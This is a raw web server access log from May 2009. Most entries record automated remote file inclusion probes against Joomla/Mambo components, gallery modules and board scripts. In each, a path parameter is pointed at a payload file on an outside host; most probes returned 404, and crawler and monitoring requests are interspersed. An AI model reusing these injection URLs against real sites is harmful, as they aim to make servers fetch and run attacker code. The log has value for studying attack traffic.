200.93.147.154 - - [19/May/2009:00:52:00 -0400] "GET /logs/access_log.Q109022600//administrator/components/com_login/admin.login.php?mosConfig_absolute_path=http://h1.ripway.com/luna121/id1.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
200.93.147.154 - - [19/May/2009:00:52:00 -0400] "GET /logs/error_log.Q109050400//administrator/components/com_login/admin.login.php?mosConfig_absolute_path=http://h1.ripway.com/luna121/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
65.98.59.178 - - [19/May/2009:00:52:43 -0400] "GET /logs/error_log.Q109050400%20%20//administrator/components/com_login/admin.login.php?mosConfig_absolute_path=http://h1.ripway.com/roni121/id1.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
65.98.59.178 - - [19/May/2009:00:52:44 -0400] "GET /logs/access_log.Q109022600%20%20//administrator/components/com_login/admin.login.php?mosConfig_absolute_path=http://h1.ripway.com/roni121/id1.txt?? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
72.52.230.168 - - [19/May/2009:00:52:51 -0400] "GET /logs/error_log.Q109051100//skin/zero_vote/ask_password.php?dir=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
122.153.212.195 - - [19/May/2009:00:52:58 -0400] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
122.153.212.195 - - [19/May/2009:00:52:58 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
122.153.212.195 - - [19/May/2009:00:52:58 -0400] "GET /logs/access_log.Q108060800///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
200.93.147.154 - - [19/May/2009:00:53:54 -0400] "GET /logs/access_log.Q109022600%20%20//administrator/components/com_login/admin.login.php?mosConfig_absolute_path=http://h1.ripway.com/luna121/id1.txt?? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
200.93.147.154 - - [19/May/2009:00:53:54 -0400] "GET /logs/error_log.Q109050400%20%20//administrator/components/com_login/admin.login.php?mosConfig_absolute_path=http://h1.ripway.com/luna121/id1.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
70.122.203.52 - - [19/May/2009:00:53:58 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB5; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; yie8)"
70.122.203.52 - - [19/May/2009:00:53:58 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB5; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; yie8)"
70.122.203.52 - - [19/May/2009:00:53:59 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB5; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; yie8)"
70.122.203.52 - - [19/May/2009:00:53:59 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB5; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; yie8)"
121.165.73.157 - - [19/May/2009:00:54:32 -0400] "GET /logs/access_log.Q109021400/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://208.98.22.241/id.txt?? HTTP/1.1" 404 259 "-" "libwww-perl/5.805"
121.165.73.157 - - [19/May/2009:00:54:32 -0400] "GET /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://208.98.22.241/id.txt?? HTTP/1.1" 404 232 "-" "libwww-perl/5.805"
121.165.73.157 - - [19/May/2009:00:54:32 -0400] "GET /logs/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://208.98.22.241/id.txt?? HTTP/1.1" 404 237 "-" "libwww-perl/5.805"
121.165.73.157 - - [19/May/2009:00:54:32 -0400] "GET /logs/access_log.Q108090400/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://208.98.22.241/id.txt?? HTTP/1.1" 404 259 "-" "libwww-perl/5.805"
60.48.93.182 - - [19/May/2009:00:54:34 -0400] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
60.48.93.182 - - [19/May/2009:00:54:34 -0400] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
60.48.93.182 - - [19/May/2009:00:54:35 -0400] "GET /logs/access_log.Q108080900%20%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
209.59.12.99 - - [19/May/2009:00:54:38 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
203.151.233.72 - - [19/May/2009:00:54:52 -0400] "GET /logs/access_log.Q108091400//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.blixweb.no/rhey/software/Fire%20scan/idfire.txt? HTTP/1.1" 404 277 "-" "libwww-perl/5.805"
203.151.233.72 - - [19/May/2009:00:54:53 -0400] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.blixweb.no/rhey/software/Fire%20scan/idfire.txt? HTTP/1.1" 404 250 "-" "libwww-perl/5.805"
203.151.233.72 - - [19/May/2009:00:54:54 -0400] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.blixweb.no/rhey/software/Fire%20scan/idfire.txt? HTTP/1.1" 404 255 "-" "libwww-perl/5.805"
91.121.210.42 - - [19/May/2009:00:55:05 -0400] "GET /index.php?sourcedir=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
91.121.210.42 - - [19/May/2009:00:55:05 -0400] "GET /logs/index.php?sourcedir=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
91.121.210.42 - - [19/May/2009:00:55:05 -0400] "GET /index.php?sourcedir=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
91.121.210.42 - - [19/May/2009:00:55:05 -0400] "GET /logs/access_log.Q108111500/index.php?sourcedir=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
91.121.210.42 - - [19/May/2009:00:55:05 -0400] "GET /logs/index.php?sourcedir=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
91.121.210.42 - - [19/May/2009:00:55:05 -0400] "GET /logs/access_log.Q108111500/index.php?sourcedir=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
91.121.210.42 - - [19/May/2009:00:55:05 -0400] "GET /logs/access_log.Q108090500/index.php?sourcedir=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
91.121.210.42 - - [19/May/2009:00:55:05 -0400] "GET /logs/access_log.Q108090500/index.php?sourcedir=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
60.48.93.182 - - [19/May/2009:00:55:49 -0400] "GET /logs/access_log.Q108090200//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
88.191.103.144 - - [19/May/2009:00:56:35 -0400] "GET /logs/access_log.Q108120600//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 288 "-" "Mozilla/5.0"
88.191.103.144 - - [19/May/2009:00:56:51 -0400] "GET /logs/access_log.Q108110900//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 288 "-" "Mozilla/5.0"
71.189.231.54 - - [19/May/2009:00:56:56 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1"
71.189.231.54 - - [19/May/2009:00:56:56 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1"
91.121.210.42 - - [19/May/2009:00:57:26 -0400] "GET /logs/access_log.Q108111500%20%20/index.php?sourcedir=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
91.121.210.42 - - [19/May/2009:00:57:26 -0400] "GET /logs/access_log.Q108090500%20%20/index.php?sourcedir=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
91.121.210.42 - - [19/May/2009:00:57:26 -0400] "GET /logs/access_log.Q108111500%20%20/index.php?sourcedir=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
91.121.210.42 - - [19/May/2009:00:57:26 -0400] "GET /logs/access_log.Q108090500%20%20/index.php?sourcedir=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
81.175.71.121 - - [19/May/2009:00:57:58 -0400] "GET /index.php?option=com_letterman&Itemid=&mosConfig_absolute_path=http://www.bmw-center.com.pl/modules/Forums/admin/fx29id2.txt??? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
81.175.71.121 - - [19/May/2009:00:57:58 -0400] "GET /logs/index.php?option=com_letterman&Itemid=&mosConfig_absolute_path=http://www.bmw-center.com.pl/modules/Forums/admin/fx29id2.txt??? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
81.175.71.121 - - [19/May/2009:00:57:58 -0400] "GET /logs/access_log.Q108082500/index.php?option=com_letterman&Itemid=&mosConfig_absolute_path=http://www.bmw-center.com.pl/modules/Forums/admin/fx29id2.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
81.175.71.121 - - [19/May/2009:00:57:59 -0400] "GET /logs/access_log.Q108082900/index.php?option=com_letterman&Itemid=&mosConfig_absolute_path=http://www.bmw-center.com.pl/modules/Forums/admin/fx29id2.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
72.52.230.168 - - [19/May/2009:00:59:30 -0400] "GET /logs/access_log.Q108110900//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 288 "-" "Mozilla/5.0"
209.59.12.99 - - [19/May/2009:00:59:39 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
203.151.233.72 - - [19/May/2009:01:01:11 -0400] "GET /logs/access_log.Q108082900//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.blixweb.no/rhey/software/Fire%20scan/idfire.txt? HTTP/1.1" 404 277 "-" "libwww-perl/5.805"
72.30.79.49 - - [19/May/2009:01:01:09 -0400] "GET /logs/access_log.Q109051000 HTTP/1.0" 200 3272696 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
122.153.212.195 - - [19/May/2009:01:02:20 -0400] "GET /logs/access_log.Q108060800%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
220.181.7.97 - - [19/May/2009:01:02:32 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
62.128.135.52 - - [19/May/2009:01:02:40 -0400] "GET /logs/access_log.Q108112400/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.cityhobo.com/language/rss?? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
62.128.135.52 - - [19/May/2009:01:02:40 -0400] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.cityhobo.com/language/rss?? HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
62.128.135.52 - - [19/May/2009:01:02:40 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.cityhobo.com/language/rss?? HTTP/1.1" 404 212 "-" "libwww-perl/5.805"
81.175.71.121 - - [19/May/2009:01:03:01 -0400] "GET /logs/index.php?option=com_letterman&Itemid=&mosConfig_absolute_path=http://www.bmw-center.com.pl/modules/Forums/admin/fx29id2.txt??? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
81.175.71.121 - - [19/May/2009:01:03:01 -0400] "GET /logs/access_log.Q108082900/index.php?option=com_letterman&Itemid=&mosConfig_absolute_path=http://www.bmw-center.com.pl/modules/Forums/admin/fx29id2.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
81.175.71.121 - - [19/May/2009:01:03:01 -0400] "GET /index.php?option=com_letterman&Itemid=&mosConfig_absolute_path=http://www.bmw-center.com.pl/modules/Forums/admin/fx29id2.txt??? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
123.125.64.38 - - [19/May/2009:01:03:18 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
62.128.135.52 - - [19/May/2009:01:03:19 -0400] "GET /logs/error_log.Q109041400/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.cityhobo.com/language/rss?? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
121.165.73.157 - - [19/May/2009:01:03:27 -0400] "GET /logs/error_log.Q108060400%20/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://208.98.22.241/id.txt?? HTTP/1.1" 404 259 "-" "libwww-perl/5.805"
84.54.137.9 - - [19/May/2009:01:03:46 -0400] "GET /logs/access_log.Q108112400/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.cityhobo.com/language/rss?? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
84.54.137.9 - - [19/May/2009:01:03:46 -0400] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.cityhobo.com/language/rss?? HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
84.54.137.9 - - [19/May/2009:01:03:47 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.cityhobo.com/language/rss?? HTTP/1.1" 404 212 "-" "libwww-perl/5.805"
84.54.137.9 - - [19/May/2009:01:04:38 -0400] "GET /logs/error_log.Q109041400/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.cityhobo.com/language/rss?? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
209.59.12.99 - - [19/May/2009:01:04:39 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
211.110.19.178 - - [19/May/2009:01:06:24 -0400] "GET /logs//outlogin.php?_zb_path=http://pallmall8.fileave.com/id.txt?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
211.110.19.178 - - [19/May/2009:01:06:24 -0400] "GET //outlogin.php?_zb_path=http://pallmall8.fileave.com/id.txt?? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
84.54.137.9 - - [19/May/2009:01:06:39 -0400] "GET /logs/error_log.Q108112400/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.cityhobo.com/language/rss?? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
62.128.135.52 - - [19/May/2009:01:06:45 -0400] "GET /logs/error_log.Q108112400/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.cityhobo.com/language/rss?? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
221.157.225.65 - - [19/May/2009:01:07:18 -0400] "GET //outlogin.php?_zb_path=http://driji.wap.sh/id.txt?? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
221.157.225.65 - - [19/May/2009:01:07:18 -0400] "GET /logs/access_log.Q109010400//outlogin.php?_zb_path=http://driji.wap.sh/id.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
221.157.225.65 - - [19/May/2009:01:07:18 -0400] "GET /logs//outlogin.php?_zb_path=http://driji.wap.sh/id.txt?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
66.249.72.114 - - [19/May/2009:01:07:39 -0400] "GET /robots.txt HTTP/1.1" 404 208 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.72.114 - - [19/May/2009:01:07:39 -0400] "GET /logs/error_log.Q109010600 HTTP/1.1" 404 223 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
62.44.79.35 - - [19/May/2009:01:07:58 -0400] "GET /logs/access_log.Q109011400/components/com_colorlab/admin.color.php?mosConfig_live_site=http://brandon420.xpg.com.br/bots/gid.txt??? HTTP/1.1" 404 264 "-" "libwww-perl/5.803"
62.44.79.35 - - [19/May/2009:01:07:58 -0400] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://brandon420.xpg.com.br/bots/gid.txt??? HTTP/1.1" 404 237 "-" "libwww-perl/5.803"
62.44.79.35 - - [19/May/2009:01:07:58 -0400] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://brandon420.xpg.com.br/bots/gid.txt??? HTTP/1.1" 404 242 "-" "libwww-perl/5.803"
62.44.79.35 - - [19/May/2009:01:07:58 -0400] "GET /logs/access_log.Q108111500/components/com_colorlab/admin.color.php?mosConfig_live_site=http://brandon420.xpg.com.br/bots/gid.txt??? HTTP/1.1" 404 264 "-" "libwww-perl/5.803"
72.30.79.49 - - [19/May/2009:01:08:11 -0400] "GET /logs/access_log.Q109050700 HTTP/1.0" 200 301885 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
72.30.79.49 - - [19/May/2009:01:08:11 -0400] "GET /logs/access_log.Q109050700 HTTP/1.0" 200 301885 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
211.110.19.178 - - [19/May/2009:01:09:14 -0400] "GET //outlogin.php?_zb_path=http://pallmall8.fileave.com/id.txt?? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
211.110.19.178 - - [19/May/2009:01:09:14 -0400] "GET /logs//outlogin.php?_zb_path=http://pallmall8.fileave.com/id.txt?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
221.157.225.65 - - [19/May/2009:01:09:18 -0400] "GET /logs//outlogin.php?_zb_path=http://driji.wap.sh/id.txt?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
221.157.225.65 - - [19/May/2009:01:09:18 -0400] "GET //outlogin.php?_zb_path=http://driji.wap.sh/id.txt?? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
221.157.225.65 - - [19/May/2009:01:09:18 -0400] "GET /logs/access_log.Q109010400%20%20//outlogin.php?_zb_path=http://driji.wap.sh/id.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
209.59.12.99 - - [19/May/2009:01:09:39 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
211.110.19.178 - - [19/May/2009:01:10:57 -0400] "GET //outlogin.php?_zb_path=http://pallmall8.fileave.com/id.txt?? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
211.110.19.178 - - [19/May/2009:01:10:57 -0400] "GET /logs//outlogin.php?_zb_path=http://pallmall8.fileave.com/id.txt?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
211.110.19.178 - - [19/May/2009:01:10:57 -0400] "GET /logs/access_log.Q109050300//outlogin.php?_zb_path=http://pallmall8.fileave.com/id.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
62.44.79.35 - - [19/May/2009:01:11:57 -0400] "GET /logs/access_log.Q109011400%20/components/com_colorlab/admin.color.php?mosConfig_live_site=http://brandon420.xpg.com.br/bots/gid.txt??? HTTP/1.1" 404 265 "-" "libwww-perl/5.803"
124.217.216.86 - - [19/May/2009:01:12:29 -0400] "GET //?_zb_path=http://ssdnb.net/bbs/data/list??? HTTP/1.1" 200 452 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
124.217.216.86 - - [19/May/2009:01:12:29 -0400] "GET /logs//?_zb_path=http://ssdnb.net/bbs/data/list??? HTTP/1.1" 200 1959 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
209.59.12.99 - - [19/May/2009:01:14:39 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
69.59.148.76 - - [19/May/2009:01:15:47 -0400] "GET /index.php?sourcedir=http://www.kyokushin.hu/data/log.txt? HTTP/1.1" 404 207 "-" "libwww-perl/5.69"
123.125.64.51 - - [19/May/2009:01:16:10 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
123.125.64.49 - - [19/May/2009:01:16:14 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
211.115.89.68 - - [19/May/2009:01:18:28 -0400] "GET /logs/access_log.Q108052200/?sourcedir=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
62.128.135.52 - - [19/May/2009:01:18:31 -0400] "GET /logs/access_log.Q108112400/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.cityhobo.com/language/rss?? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
62.128.135.52 - - [19/May/2009:01:18:31 -0400] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.cityhobo.com/language/rss?? HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
62.128.135.52 - - [19/May/2009:01:18:31 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.cityhobo.com/language/rss?? HTTP/1.1" 404 212 "-" "libwww-perl/5.805"
209.59.12.99 - - [19/May/2009:01:19:39 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
81.175.71.121 - - [19/May/2009:01:20:07 -0400] "GET /logs/access_log.Q108061500//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.bmw-center.com.pl/modules/Forums/admin/fx29id2.txt??? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
81.175.71.121 - - [19/May/2009:01:20:07 -0400] "GET /logs/access_log.Q108120600//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.bmw-center.com.pl/modules/Forums/admin/fx29id2.txt??? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
81.175.71.121 - - [19/May/2009:01:20:07 -0400] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.bmw-center.com.pl/modules/Forums/admin/fx29id2.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
81.175.71.121 - - [19/May/2009:01:20:07 -0400] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.bmw-center.com.pl/modules/Forums/admin/fx29id2.txt??? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
81.175.71.121 - - [19/May/2009:01:20:47 -0400] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.bmw-center.com.pl/modules/Forums/admin/fx29id2.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
81.175.71.121 - - [19/May/2009:01:20:47 -0400] "GET /logs/access_log.Q108120600//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.bmw-center.com.pl/modules/Forums/admin/fx29id2.txt??? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
81.175.71.121 - - [19/May/2009:01:20:47 -0400] "GET /logs/access_log.Q108061500//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.bmw-center.com.pl/modules/Forums/admin/fx29id2.txt??? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
81.175.71.121 - - [19/May/2009:01:20:47 -0400] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.bmw-center.com.pl/modules/Forums/admin/fx29id2.txt??? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
81.175.71.121 - - [19/May/2009:01:21:10 -0400] "GET /logs/index.php?option=com_letterman&Itemid=&mosConfig_absolute_path=http://www.bmw-center.com.pl/modules/Forums/admin/fx29id2.txt??? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
81.175.71.121 - - [19/May/2009:01:21:10 -0400] "GET /index.php?option=com_letterman&Itemid=&mosConfig_absolute_path=http://www.bmw-center.com.pl/modules/Forums/admin/fx29id2.txt??? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
81.175.71.121 - - [19/May/2009:01:21:10 -0400] "GET /logs/access_log.Q108082500/index.php?option=com_letterman&Itemid=&mosConfig_absolute_path=http://www.bmw-center.com.pl/modules/Forums/admin/fx29id2.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
81.175.71.121 - - [19/May/2009:01:21:17 -0400] "GET /logs/access_log.Q108082900/index.php?option=com_letterman&Itemid=&mosConfig_absolute_path=http://www.bmw-center.com.pl/modules/Forums/admin/fx29id2.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
72.30.79.49 - - [19/May/2009:01:21:39 -0400] "GET /logs/error_log.Q109051500 HTTP/1.0" 200 6964123 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
72.30.79.49 - - [19/May/2009:01:21:56 -0400] "GET /logs/access_log.Q107100100 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
221.139.104.104 - - [19/May/2009:01:22:35 -0400] "GET /index.php?sourcedir=http://www.kyokushin.hu/data/log.txt??? HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
221.139.104.104 - - [19/May/2009:01:22:35 -0400] "GET /index.php?sourcedir=http://www.kyokushin.hu/data/log.txt??? HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
72.30.79.49 - - [19/May/2009:01:21:40 -0400] "GET /logs/error_log.Q109051500 HTTP/1.0" 200 6964123 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
221.139.104.104 - - [19/May/2009:01:23:20 -0400] "GET /logs/access_log.Q108090500/index.php?sourcedir=http://www.kyokushin.hu/data/log.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
221.139.104.104 - - [19/May/2009:01:23:20 -0400] "GET /index.php?sourcedir=http://www.kyokushin.hu/data/log.txt??? HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
221.139.104.104 - - [19/May/2009:01:23:21 -0400] "GET /logs/index.php?sourcedir=http://www.kyokushin.hu/data/log.txt??? HTTP/1.1" 404 212 "-" "libwww-perl/5.805"
221.139.104.104 - - [19/May/2009:01:23:25 -0400] "GET /logs/access_log.Q108090500/index.php?sourcedir=http://www.kyokushin.hu/data/log.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
221.139.104.104 - - [19/May/2009:01:23:25 -0400] "GET /index.php?sourcedir=http://www.kyokushin.hu/data/log.txt??? HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
